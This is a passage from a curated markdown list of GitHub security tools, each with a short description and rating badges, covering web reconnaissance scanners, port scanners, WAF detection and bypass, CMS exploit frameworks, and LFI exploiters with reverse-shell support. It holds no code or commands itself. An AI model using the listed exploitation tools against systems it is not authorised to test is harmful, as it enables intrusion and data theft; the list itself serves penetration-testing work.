![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fnk0c/cangibrina?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/aipengjie/sensitivefilescan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fnk0c/cangibrina?style=flat-square) ![GitHub](https://img.shields.io/github/license/fnk0c/cangibrina?style=flat-square)\n\n- https://github.com/n4xh4ck5/CMSsc4n - **Tool to identify if a domain is a CMS such as Wordpress, Moodle, Joomla**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/n4xh4ck5/CMSsc4n?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/n4xh4ck5/CMSsc4n?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/n4xh4ck5/CMSsc4n?style=flat-square) ![GitHub](https://img.shields.io/github/license/n4xh4ck5/CMSsc4n?style=flat-square)\n\n- https://github.com/Ekultek/WhatWaf - **Detect and bypass web application firewalls and protection systems**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ekultek/WhatWaf?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ekultek/WhatWaf?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ekultek/WhatWaf?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ekultek/WhatWaf?style=flat-square)\n\n- https://github.com/dzonerzy/goWAPT - **Go web application penetration test and web application fuzz tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dzonerzy/goWAPT?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dzonerzy/goWAPT?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dzonerzy/goWAPT?style=flat-square) ![GitHub](https://img.shields.io/github/license/dzonerzy/goWAPT?style=flat-square)\n\n- https://github.com/blackye/webdirdig - **Sensitive files scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/webdirdig?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/webdirdig?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/webdirdig?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/webdirdig?style=flat-square)\n\n- https://github.com/boy-hack/w8fuckcdn - **Get the website real IP address by scanning the entire net**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/w8fuckcdn?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/w8fuckcdn?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/w8fuckcdn?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/w8fuckcdn?style=flat-square)\n\n- https://github.com/boy-hack/w11scan - **Distributed web fingerprint identification platform**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/w11scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/w11scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/w11scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/w11scan?style=flat-square)\n\n- https://github.com/Nekmo/dirhunt - **Find web directories without bruteforce**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Nekmo/dirhunt?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Nekmo/dirhunt?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Nekmo/dirhunt?style=flat-square) ![GitHub](https://img.shields.io/github/license/Nekmo/dirhunt?style=flat-square)\n\n- https://github.com/H4ckForJob/dirmap - **An advanced web directory scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/H4ckForJob/dirmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/H4ckForJob/dirmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/H4ckForJob/dirmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/H4ckForJob/dirmap?style=flat-square)\n\n- https://github.com/s0md3v/Photon - **Incredibly fast crawler which extracts urls, emails, files, website accounts and much more**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Photon?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Photon?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Photon?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Photon?style=flat-square)\n\n- https://github.com/1N3/BlackWidow - **Gather OSINT and fuzz for OWASP vulnerabilities on a target website**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/BlackWidow?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/BlackWidow?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/BlackWidow?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/BlackWidow?style=flat-square)\n\n- https://github.com/saeeddhqan/Maryam - **OSINT and Web-based Footprinting modular framework based on the Recon-ng**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/saeeddhqan/Maryam?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/saeeddhqan/Maryam?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/saeeddhqan/Maryam?style=flat-square) ![GitHub](https://img.shields.io/github/license/saeeddhqan/Maryam?style=flat-square)\n\n- https://github.com/lcatro/network_backdoor_scanner - **An internal network scanner like meterpreter**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-C++-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lcatro/network_backdoor_scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lcatro/network_backdoor_scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lcatro/network_backdoor_scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/lcatro/network_backdoor_scanner?style=flat-square)\n\n- https://github.com/Tib3rius/AutoRecon - **A multi-threaded network reconnaissance tool which performs automated enumeration of services**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tib3rius/AutoRecon?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tib3rius/AutoRecon?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tib3rius/AutoRecon?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tib3rius/AutoRecon?style=flat-square)\n\n- https://github.com/sowish/LNScan - **Local Network Scanner based on BBScan via.lijiejie**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/sowish/LNScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/sowish/LNScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/sowish/LNScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/sowish/LNScan?style=flat-square)\n\n- https://github.com/shadow1ng/fscan - **Intranet integrated scanning tool,build for automatic, full coverage scanning**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shadow1ng/fscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shadow1ng/fscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/shadow1ng/fscan?style=flat-square)\n\n- https://github.com/b1gcat/DarkEye - **Ports scan and host-alived detect**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/b1gcat/DarkEye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/b1gcat/DarkEye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/b1gcat/DarkEye?style=flat-square) ![GitHub](https://img.shields.io/github/license/b1gcat/DarkEye?style=flat-square)\n\n- https://github.com/v-byte-cpu/sx - **A network scanner that 30x times faster than nmap**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/v-byte-cpu/sx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/v-byte-cpu/sx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/v-byte-cpu/sx?style=flat-square) ![GitHub](https://img.shields.io/github/license/v-byte-cpu/sx?style=flat-square)\n\n- https://github.com/nullt3r/jfscan - **Super fast port scanning & service discovery using Masscan and Nmap**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nullt3r/jfscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nullt3r/jfscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nullt3r/jfscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/nullt3r/jfscan?style=flat-square)\n\n- https://github.com/lcvvvv/kscan - **Port scanning, protocol detection(1200+), fingerprint(1w+) and brute force cracking**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lcvvvv/kscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lcvvvv/kscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lcvvvv/kscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/lcvvvv/kscan?style=flat-square)\n\n- https://github.com/OJ/gobuster - **Directory/File, DNS and VHost busting tool written in Go**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OJ/gobuster?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OJ/gobuster?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OJ/gobuster?style=flat-square) ![GitHub](https://img.shields.io/github/license/OJ/gobuster?style=flat-square)\n\n\n### Special Targets Scan\n\n- https://github.com/1N3/XSSTracer - **A small python script to check for cross-Site tracing, Clickjacking etc**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/XSSTracer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/XSSTracer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/XSSTracer?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/XSSTracer?style=flat-square)\n\n- https://github.com/0xHJK/dumpall - **`.git` / `.svn` / `.DS_Store` disclosure exploit**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xHJK/dumpall?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xHJK/dumpall?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xHJK/dumpall?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xHJK/dumpall?style=flat-square)\n\n- https://github.com/shengqi158/svnhack - **A `.svn` folder disclosure exploit**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-NSE-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shengqi158/svnhack?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shengqi158/svnhack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shengqi158/svnhack?style=flat-square) ![GitHub](https://img.shields.io/github/license/shengqi158/svnhack?style=flat-square)\n\n- https://github.com/lijiejie/GitHack - **A `.git` folder disclosure exploit**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/GitHack?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/GitHack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/GitHack?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/GitHack?style=flat-square)\n\n- https://github.com/blackye/Jenkins - **Jenkins vulnerability detection, user grab enumerating**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/Jenkins?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/Jenkins?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/Jenkins?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/Jenkins?style=flat-square)\n\n- https://github.com/code-scan/dzscan - **discuz scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/code-scan/dzscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/code-scan/dzscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/code-scan/dzscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/code-scan/dzscan?style=flat-square)\n\n- https://github.com/chuhades/CMS-Exploit-Framework -**CMS exploit framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chuhades/CMS-Exploit-Framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chuhades/CMS-Exploit-Framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chuhades/CMS-Exploit-Framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/chuhades/CMS-Exploit-Framework?style=flat-square)\n\n- https://github.com/lijiejie/IIS_shortname_Scanner - **An IIS shortname scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/IIS_shortname_Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/IIS_shortname_Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/IIS_shortname_Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/IIS_shortname_Scanner?style=flat-square)\n\n- https://github.com/riusksk/FlashScanner - **Flash XSS scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/riusksk/FlashScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/riusksk/FlashScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/riusksk/FlashScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/riusksk/FlashScanner?style=flat-square)\n\n- https://github.com/epinna/tplmap - **Automatic Server-Side Template Injection detection and exploitation tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/epinna/tplmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/epinna/tplmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/epinna/tplmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/epinna/tplmap?style=flat-square)\n\n- https://github.com/rastating/wordpress-exploit-framework - **Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rastating/wordpress-exploit-framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rastating/wordpress-exploit-framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rastating/wordpress-exploit-framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/rastating/wordpress-exploit-framework?style=flat-square)\n\n- https://github.com/ilmila/J2EEScan - **A plugin for Burp Suite proxy to improve the test coverage during web application penetration tests on J2EE applications**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ilmila/J2EEScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ilmila/J2EEScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ilmila/J2EEScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ilmila/J2EEScan?style=flat-square)\n\n- https://github.com/riusksk/StrutScan - **Struts2 vuls scanner base Perl script**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/riusksk/StrutScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/riusksk/StrutScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/riusksk/StrutScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/riusksk/StrutScan?style=flat-square)\n\n- https://github.com/D35m0nd142/LFISuite - **Totally automatic LFI exploiterand scanner supports reverse shell**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/D35m0nd142/LFISuite?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/D35m0nd142/LFISuite?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/D35m0nd142/LFISuite?style=flat-square) ![GitHub](https://img.shields.io/github/license/D35m0nd142/LFISuite?style=flat-square)\n\n- https://github.com/0x4D31/salt-scanner - **Linux vulnerability scanner based on Salt Open and vulners audit API, with Slack notifications and JIRA integration**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0x4D31/salt-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0x4D31/salt-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0x4D31/salt-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/0x4D31/salt-scanner?style=flat-square)\n\n- https://github.com/tijme/angularjs-csti-scanner - **Automated client-side template injection detection for AngularJS**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/tijme/angularjs-csti-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/tijme/angularjs-csti-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/tijme/angularjs-csti-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/tijme/angularjs-csti-scanner?style=flat-square)\n\n- https://github.com/irsdl/IIS-ShortName-Scanner - **Scanners for IIS short filename 8.3 disclosure vulnerability**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/irsdl/IIS-ShortName-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/irsdl/IIS-ShortName-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/irsdl/IIS-ShortName-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/irsdl/IIS-ShortName-Scanner?style=flat-square)\n\n- https://github.com/swisskyrepo/Wordpresscan - **WPScan rewritten in Python + some WPSeku ideas**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/swisskyrepo/Wordpresscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/swisskyrepo/Wordpresscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/swisskyrepo/Wordpresscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/swisskyrepo/Wordpresscan?style=flat-square)\n\n- https://github.com/CHYbeta/cmsPoc - **CMS exploit framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/CHYbeta/cmsPoc?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/CHYbeta/cmsPoc?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/CHYbeta/cmsPoc?style=flat-square) ![GitHub](https://img.shields.io/github/license/CHYbeta/cmsPoc?style=flat-square)\n\n- https://github.com/3gstudent/Smbtouch-Scanner - **Automatically scan the inner network to detect whether they are vulnerable**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3gstudent/Smbtouch-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3gstudent/Smbtouch-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3gstudent/Smbtouch-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/3gstudent/Smbtouch-Scanner?style=flat-square)\n\n- https://github.com/OsandaMalith/LFiFreak - **A unique automated LFI exploiter with bind/reverse shells**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OsandaMalith/LFiFreak?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OsandaMalith/LFiFreak?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OsandaMalith/LFiFreak?style=flat-square) ![GitHub](https://img.shields.io/github/license/OsandaMalith/LFiFreak?style=flat-square)\n\n- https://github.com/mak-/parameth - **This tool can be used to brute discover GET and POST parameters**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mak-/parameth?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mak-/parameth?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mak-/parameth?style=flat-square) ![GitHub](https://img.shields.io/github/license/mak-/parameth?style=flat-square)\n\n- https://github.com/Lucifer1993/struts-scan - **Struts2 vuls scanner,supported all vuls**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Lucifer1993/struts-scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Lucifer1993/struts-scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Lucifer1993/struts-scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/Lucifer1993/struts-scan?style=flat-square)\n\n- https://github.com/hahwul/a2sv - **Auto scanning to SSL vulnerability, such as heartbleed etc**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hahwul/a2sv?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hahwul/a2sv?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hahwul/a2sv?style=flat-square) ![GitHub](https://img.shields.io/github/license/hahwul/a2sv?style=flat-square)\n\n- https://github.com/NickstaDB/BaRMIe - **Java RMI enumeration and attack tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/NickstaDB/BaRMIe?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/NickstaDB/BaRMIe?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/NickstaDB/BaRMIe?style=flat-square) ![GitHub](https://img.shields.io/github/license/NickstaDB/BaRMIe?style=flat-square)\n\n- https://github.com/RetireJS/grunt-retire - **Scanner detecting the use of Javascript libraries with known vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/RetireJS/grunt-retire?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/RetireJS/grunt-retire?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/RetireJS/grunt-retire?style=flat-square) ![GitHub](https://img.shields.io/github/license/RetireJS/grunt-retire?style=flat-square)\n\n- https://github.com/kotobukki/BDA - **The vulnerability detector for Hadoop and Spark**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/kotobukki/BDA?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/kotobukki/BDA?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/kotobukki/BDA?style=flat-square) 